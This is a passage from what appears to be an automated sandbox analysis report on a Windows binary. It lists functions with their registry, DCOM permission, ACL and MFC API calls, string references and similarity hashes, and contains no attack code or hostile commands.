RegOpenKeyW.ADVAPI32(00000000,Ole1Class,?), ref: 00D37C54
RegCloseKey.ADVAPI32(?), ref: 00D37C89
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
#861.MFC42U(?), ref: 00D37EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE

Strings

ToolboxBitmap32, xrefs: 00D37E8F
ToolboxBitmap, xrefs: 00D37EB2
Ole1Class, xrefs: 00D37C49

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CloseQueryValue$#861Openlstrcmpi
String ID: Ole1Class$ToolboxBitmap$ToolboxBitmap32
API String ID: 3677012654-1216609433
Opcode ID: a76b9fb18c72efa134a359c738b416ecd0ab4fa42792abd41b384de5d8c150a2
Instruction ID: 6248544194c541435333441388f43a23b782ee79ee42ec3bfcedd4275277de7f
Opcode Fuzzy Hash: a76b9fb18c72efa134a359c738b416ecd0ab4fa42792abd41b384de5d8c150a2
Instruction Fuzzy Hash: 7D21F7B594461DDFDB20DF10DC88BD977B8BB24305F0401E5E51AA62A1DB709E94DF30

Function 00D2E810 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00D2E81D
SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2E848
SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2E86C
#1662.MFC42U ref: 00D2E874

Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F

#2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTACCESSPERMISSION), ref: 00D2E896

Strings

DEFAULTACCESSPERMISSION, xrefs: 00D2E879
j, xrefs: 00D2E865
SOFTWARE\MICROSOFT\OLE, xrefs: 00D2E87E
User/Group, xrefs: 00D2E833
Can Access, xrefs: 00D2E85E

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
String ID: Can Access$DEFAULTACCESSPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
API String ID: 3233431167-2986021116
Opcode ID: 6aefe4ed45d9632237b62f807e8e7a0a0fb363ddac02f263ea5e3bbc71936e9d
Instruction ID: a938844137b36b1d5782ca9fac5529651faafcdb2be905292d015b8c34bbe3a6
Opcode Fuzzy Hash: 6aefe4ed45d9632237b62f807e8e7a0a0fb363ddac02f263ea5e3bbc71936e9d
Instruction Fuzzy Hash: 84017171500318AFEB10AFA0DC46FEF7BB9EB45714F100519F501B2280C7B599558AB9

Function 00D2EA00 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00D2EA0D
SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2EA38
SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2EA5C
#1662.MFC42U ref: 00D2EA64

Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F

#2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTLAUNCHPERMISSION), ref: 00D2EA86

Strings

DEFAULTLAUNCHPERMISSION, xrefs: 00D2EA69
j, xrefs: 00D2EA55
SOFTWARE\MICROSOFT\OLE, xrefs: 00D2EA6E
Can Launch, xrefs: 00D2EA4E
User/Group, xrefs: 00D2EA23

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
String ID: Can Launch$DEFAULTLAUNCHPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
API String ID: 3233431167-4187468794
Opcode ID: 7b2daae79707055ab68f666a0136e84ae4615ec2bab522db10946f9cbed2d548
Instruction ID: 9675d381a3a6b3585a4a2cd78b7fbb71c46f7255021ae7cf8287782c0cce9653
Opcode Fuzzy Hash: 7b2daae79707055ab68f666a0136e84ae4615ec2bab522db10946f9cbed2d548
Instruction Fuzzy Hash: 2E017171500318AFEB10AFA4DC46FEF7BB9EB85714F000419F501B6280C7B99A558AB5

Function 00D32D10 Relevance: 16.6, APIs: 11, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 00D3B37C: __EH_prolog3.LIBCMT ref: 00D3B383
Part of subcall function 00D3B37C: #324.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B395
Part of subcall function 00D3B37C: #540.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3A7
Part of subcall function 00D3B37C: #861.MFC42U(00D221A0,00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3B8

#858.MFC42U(?,?,23685920), ref: 00D32D5E
#2506.MFC42U(?,?,23685920), ref: 00D32D69
#800.MFC42U(?,?,23685920), ref: 00D32D7A
#641.MFC42U(?,?,23685920), ref: 00D32D85
#858.MFC42U(?,?,?,23685920), ref: 00D32D99
#2910.MFC42U(00000104,?,?,?,23685920), ref: 00D32DB2
#5568.MFC42U(000000FF,00000104,?,?,?,23685920), ref: 00D32E4F
#800.MFC42U(000000FF,00000104,?,?,?,23685920), ref: 00D32E61
#641.MFC42U(000000FF,00000104,?,?,?,23685920), ref: 00D32E6C

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #641#800#858$#2506#2910#324#540#5568#861H_prolog3
String ID:
API String ID: 1871001060-0
Opcode ID: b956a72d237133cd048fe196d9e7120977aae2028344d5b045ff36e9a691b845
Instruction ID: 8ec104dbe4b26bafe151150a39b4de57dcd4ed61248d40bbd6f881a9e72df1cf
Opcode Fuzzy Hash: b956a72d237133cd048fe196d9e7120977aae2028344d5b045ff36e9a691b845
Instruction Fuzzy Hash: F551F570D00209DBDB14EBA8D996BEEB7B5FF04310F244529E022B72E1DB349A05CB71

Function 00D3CE81 Relevance: 16.6, APIs: 11, Instructions: 82COMMON

Download Yara Rule

APIs

SetSecurityDescriptorGroup.ADVAPI32(00000000,00000000,?,00000000,?,00D3CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CE90
GetLastError.KERNEL32(?,00D3CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CE9A
free.MSVCRT ref: 00D3CEBE
IsValidSid.ADVAPI32(00000000,00000000,?,?,00D3CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CED7

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: DescriptorErrorGroupLastSecurityValidfree
String ID:
API String ID: 3125347566-0
Opcode ID: 053d8f0842f843ab98447ed1461b14455eba6a7289b6a1688ffccf80a940beaf
Instruction ID: afbddaa47726fe3e1c180b9b64bd861f6c3c0951ca07879179033b2babd2b74b
Opcode Fuzzy Hash: 053d8f0842f843ab98447ed1461b14455eba6a7289b6a1688ffccf80a940beaf
Instruction Fuzzy Hash: 3021953A215212EBD7101F62EC08736BBA9FF01761F259126F915FA260D735DCA09BF0

Function 00D3CF6C Relevance: 16.6, APIs: 11, Instructions: 82COMMON

Download Yara Rule

APIs

SetSecurityDescriptorOwner.ADVAPI32(00000000,00000000,?,00000000,?,00D3CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CF7B
GetLastError.KERNEL32(?,00D3CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CF85
free.MSVCRT ref: 00D3CFA9
IsValidSid.ADVAPI32(00000000,00000000,?,?,00D3CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CFC2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: DescriptorErrorLastOwnerSecurityValidfree
String ID:
API String ID: 2895241793-0
Opcode ID: 2c9405b32270687c01055fa82d0ee6fdb626b0664c9b85759d10a4c7cde5b73f
Instruction ID: 7e9cd2bb39b7faa35c0471ddfb949b7962bcec36e3021dc4fc3bf5c78fee6199
Opcode Fuzzy Hash: 2c9405b32270687c01055fa82d0ee6fdb626b0664c9b85759d10a4c7cde5b73f
Instruction Fuzzy Hash: 4321B339205212EBD7241F61ED08726BBAAFF01B61F148126F945D6260D739D861DFF4

Function 00D3693C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 164registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,Interface,00000000), ref: 00D369E0
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00D36A19
RegQueryValueW.ADVAPI32(00000000,?,?,00000200), ref: 00D36A4C
wsprintfW.USER32 ref: 00D36A7F
CLSIDFromString.OLE32(00000000,-00000008), ref: 00D36B21
RegCloseKey.ADVAPI32(00000000), ref: 00D36C0A

Strings

', xrefs: 00D369A8
Interface, xrefs: 00D369D6
%s <no name>, xrefs: 00D36A73

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CloseEnumFromOpenQueryStringValuewsprintf
String ID: %s <no name>$'$Interface
API String ID: 4261639067-2844714346
Opcode ID: 297c3dbde3c50e269e79a7179e9fbce75aa1391bafc1e47bb8b880d0233ea6d7
Instruction ID: 61d3b84828b81006b62516f8846eca906aa5f2846e68284b56fe586f99fac542
Opcode Fuzzy Hash: 297c3dbde3c50e269e79a7179e9fbce75aa1391bafc1e47bb8b880d0233ea6d7
Instruction Fuzzy Hash: C381D0759012699FDB60DF64CD89BADB7B8FB08315F1081EAE409E7291DB749E84CF20

Function 00D2CD80 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 113stringwindowCOMMON

Download Yara Rule

APIs

#6330.MFC42U(00000001), ref: 00D2CD9C
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2CE3D
lstrcpyW.KERNEL32(?,Interactive User,?,?,00D221A0,RemoteServerName,00000001), ref: 00D2CE53
#3870.MFC42U(?,000000FF,?,?,00D221A0,RemoteServerName,00000001), ref: 00D2CE67
lstrlenW.KERNEL32(?,?,000000FF,?,?,00D221A0,RemoteServerName,00000001), ref: 00D2CE73

Strings

RunAs, xrefs: 00D2CE8A, 00D2CEA4
RemoteServerName, xrefs: 00D2CDFC, 00D2CE16
Interactive User, xrefs: 00D2CE4D
ActivateAtStorage, xrefs: 00D2CDBA, 00D2CDD4

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #3870#6330MessageSendlstrcpylstrlen
String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
API String ID: 952077393-4117267133
Opcode ID: 7778626ebff43784ae275828049c8b7a0ba42467a66aee2bb0ed550cd34c1ff9
Instruction ID: a0d4e3517c5f764f261d7fa4cab561cb9975ba83d49c20d4461af239eadf17f6
Opcode Fuzzy Hash: 7778626ebff43784ae275828049c8b7a0ba42467a66aee2bb0ed550cd34c1ff9
Instruction Fuzzy Hash: E331E471640725BADB12FE24AC87F7B37AADF16B08F4500A4BD10AF0C2DAF19D088671

Function 00D3B580 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80stringwindowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00D3B59A

Part of subcall function 00D3D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
Part of subcall function 00D3D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
Part of subcall function 00D3D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738

lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00D3B5DB
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D3B5FC
lstrcmpiW.KERNEL32(?,00D22778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100), ref: 00D3B63D
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D3B655
#2634.MFC42U(00000000), ref: 00D3B664

Strings

EnableRemoteConnect, xrefs: 00D3B619
EnableDCOM, xrefs: 00D3B5B7
SOFTWARE\MICROSOFT\OLE, xrefs: 00D3B5BC, 00D3B61E

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSendlstrcmpi$#2634#4704CloseOpenQueryValue
String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE
API String ID: 3026051211-444212459
Opcode ID: 1977f3f53d552cfa3b8bb9cc20606c91cefc285878a481d43410da5264a833ac
Instruction ID: 5fd3ec3c2482ca868a3352df6d5963248f3c4307bbea139f4adc02930481d5b2
Opcode Fuzzy Hash: 1977f3f53d552cfa3b8bb9cc20606c91cefc285878a481d43410da5264a833ac
Instruction Fuzzy Hash: 9E21C975600328BBD720AB61DC4AFE77BADEF05754F000066F619E2192DB70DE44CAB0

Function 00D3C61E Relevance: 15.1, APIs: 10, Instructions: 96COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32(00000000,00D3BA07,0000000C,00000002,00000000,0000000C,?,?,00D3BA07), ref: 00D3C64E
GetLastError.KERNEL32(?,00D3BA07), ref: 00D3C658
GetLengthSid.ADVAPI32(00000000,00000001,00000000,0000000C,?,?,00D3BA07), ref: 00D3C675
malloc.MSVCRT ref: 00D3C687
InitializeAcl.ADVAPI32(00000000,00000002,00000002,00D3BA07), ref: 00D3C6A1
AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000000,00000000), ref: 00D3C6B2
GetLastError.KERNEL32 ref: 00D3C6BC
free.MSVCRT ref: 00D3C6D2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ErrorLast$AccessAllowedInformationInitializeLengthfreemalloc
String ID:
API String ID: 86704185-0
Opcode ID: 631048e8eff6cb5b2797f14c19b18fee7f5bf6aa0b507031e3827d52390ed712
Instruction ID: 2a2db7b1d2c683dcff2d31dc1ffa8521571a25a98123d1cd42b342270feec4e7
Opcode Fuzzy Hash: 631048e8eff6cb5b2797f14c19b18fee7f5bf6aa0b507031e3827d52390ed712
Instruction Fuzzy Hash: 7431DF7A610716EBC7119F699C4ABAE77B8EF86320F155019F902F7250EB34C9418BB4

Function 00D2EFE0 Relevance: 15.0, APIs: 10, Instructions: 39stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2EFEA
#540.MFC42U(000000F8), ref: 00D2EFF7

Part of subcall function 00D2CF40: __EH_prolog3.LIBCMT ref: 00D2CF47
Part of subcall function 00D2CF40: #324.MFC42U(00000092,?,00000008), ref: 00D2CF59
Part of subcall function 00D2CF40: #567.MFC42U(00000092,?,00000008), ref: 00D2CF73

#3871.MFC42U(?,000000F8), ref: 00D2F01F
lstrcpyW.KERNEL32(?,?,?,000000F8), ref: 00D2F031
#2506.MFC42U ref: 00D2F03D
#6195.MFC42U(?), ref: 00D2F050
#6330.MFC42U(00000000), ref: 00D2F059
#693.MFC42U(00000000), ref: 00D2F061
#641.MFC42U(00000000), ref: 00D2F06C
#800.MFC42U(00000000), ref: 00D2F077

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2506#324#3871#540#567#6195#6330#641#693#800H_prolog3H_prolog3_lstrcpy
String ID:
API String ID: 768229929-0
Opcode ID: 2fd9d671ff3676a954013360ae2267456574f698795813eabd1e73799d81f935
Instruction ID: df4d30a45c1f85f8ad771d3887c5c51bed9ffebdc36553ad6454b9ff5554137c
Opcode Fuzzy Hash: 2fd9d671ff3676a954013360ae2267456574f698795813eabd1e73799d81f935
Instruction Fuzzy Hash: EE0108719001299BCB25EB60D996BEDB779EF65300F8000A8E146671C2DFB46F88CF72

Function 00D2F46C Relevance: 15.0, APIs: 10, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

#800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F47D
#800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F488
#800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F493
#800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F49E
#616.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4A9
#656.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4B4
#609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4BF
#609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4CA
#804.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4D2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#609$#616#656#804
String ID:
API String ID: 3383334730-0
Opcode ID: c426ba9c8f8e0775a2648d2395d681a0827f9e46b892440f8d3c173662357bc8
Instruction ID: dd127e62e98e5993d551a8b50b034bdbc3f8df3e57af48ceed35894028e98c41
Opcode Fuzzy Hash: c426ba9c8f8e0775a2648d2395d681a0827f9e46b892440f8d3c173662357bc8
Instruction Fuzzy Hash: 1BF07A350806158BC239FB30E992AEAB7A2EF64351F50092DB0E7171D2AF707A45CE70

Function 00D2C6F3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2C722

Part of subcall function 00D3D2F7: wsprintfW.USER32 ref: 00D3D35B
Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,00D260AC), ref: 00D3D376
Part of subcall function 00D3D2F7: lstrcatW.KERNEL32(?,?), ref: 00D3D37E

Part of subcall function 00D3C0BC: __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
Part of subcall function 00D3C0BC: #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
Part of subcall function 00D3C0BC: RegOpenKeyExW.ADVAPI32 ref: 00D3C112
Part of subcall function 00D3C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
Part of subcall function 00D3C0BC: RegCloseKey.ADVAPI32(?), ref: 00D3C151
Part of subcall function 00D3C0BC: #800.MFC42U ref: 00D3C15F

SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C78D
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C79D
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C7A9
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C7B8
#2634.MFC42U(00000001,?,?,?,?), ref: 00D2C7C8
#2634.MFC42U(00000001,00000001,?,?,?,?), ref: 00D2C7D4

Strings

AccessPermission, xrefs: 00D2C751

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#2634lstrcat$#540#800CloseH_prolog3_OpenQueryValuewsprintf
String ID: AccessPermission
API String ID: 1928919276-2751749857
Opcode ID: 9f07c97c8644cb28a9a7fdcfc4c4705f2dd0bb2ddd1e52f088568994d51dd3cf
Instruction ID: d9fba3fcc77b3f9f57b4783ca76162c348d7d90c81eee2099a863f2dabdf52b2
Opcode Fuzzy Hash: 9f07c97c8644cb28a9a7fdcfc4c4705f2dd0bb2ddd1e52f088568994d51dd3cf
Instruction Fuzzy Hash: E721AEB1500719FFEB24AF60DC89FABBB6CEB05344F014164B519A2291DBB16D80CBB0

Function 00D317C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D317C7
#2859.MFC42U(?,0000000C), ref: 00D317CF
#538.MFC42U(QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00D31803

Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13

#800.MFC42U(?,00000000,QueryInterface(IID_IUnknown) failed on the data object.,?,?,?,?,0000000C), ref: 00D31819
#538.MFC42U(Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00D31828
#800.MFC42U(00000000,?,Drag and Drop Data Object,?,?,?,?,0000000C), ref: 00D3184D

Strings

QueryInterface(IID_IUnknown) failed on the data object., xrefs: 00D317FB
Drag and Drop Data Object, xrefs: 00D31820

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#538H_prolog3$#1197#2810#2859#540#858#922FormatFreeLocalMessage
String ID: Drag and Drop Data Object$QueryInterface(IID_IUnknown) failed on the data object.
API String ID: 393685950-3430251513
Opcode ID: 1e1aac58978947964bcec5d30a0734772547fc49d5a5db917ac33dc0a00675e1
Instruction ID: 74e1719fffaee71700c61caac27e882145d90e5c0f5cc865aa1776536495340c
Opcode Fuzzy Hash: 1e1aac58978947964bcec5d30a0734772547fc49d5a5db917ac33dc0a00675e1
